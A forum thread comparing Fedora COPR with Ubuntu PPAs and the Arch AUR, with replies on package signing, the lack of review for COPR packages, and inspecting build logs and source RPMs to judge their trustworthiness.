COPR vs PPA. How do I verify package authenticity?

How is the Fedora COPR different from Ubuntu PPAs and Arch AUR?

And is there any way to verify that what I am downloading is not malicious ?

I think COPR is very similar to the other two build systems mentioned.

There is no way to verify that a package does not contain anything malicious unless you review the source code.

Packages are signed, so you can verify that you receive and install an unmodified package but you still have to trust the author or packager about the content. No third-person review is taking place.

2 Likes

That’s the primary difference between packages served in the Fedora repositories and those served in COPR. For a package to be in the Fedora repositories, it must pass review by another package maintainer:

https://fedoraproject.org/wiki/Join_the_package_collection_maintainers#Create_Your_Review_Request

One can see the current packages in review here:

https://fedoraproject.org/PackageReviewStatus/

1 Like

So COPR exists for those who don’t want to build from source but the software they want is not present in the official repos.

Pretty much, yes. It’s unlike AUR in that the packages are pre-built instead of built locally on your machine, other than that it is pretty much the same.

One thing that is nice is that while you cannot verify that the package isn’t malicious without looking at the source it was built from, you can at least - by clicking on a build - look at the template that created the package, as well as all build logs etc. The package is built on the same infrastructure using the same tools/rules as normal packages.
The main difference is that there is no quality control beyond what the packager did themselves, and that anyone can put packages on COPR, while only vetted packagers can put packages into the official repos.

Edit: In practical terms, on top of build logs, you can get the source package (.src.rpm) of the built, which will contain the source tarball as well as the file that defines how the package is built (specfile). Those two are the only things the packager has control over, so that would be the things you’d need to check for anything iffy.

2 Likes

@lcts answer covers it pretty much.

While software in COPR does not need to adhere to the packaging guidelines, it is suggested that they do so. More info in the docs:

https://docs.pagure.org/copr.copr/user_documentation.html#faq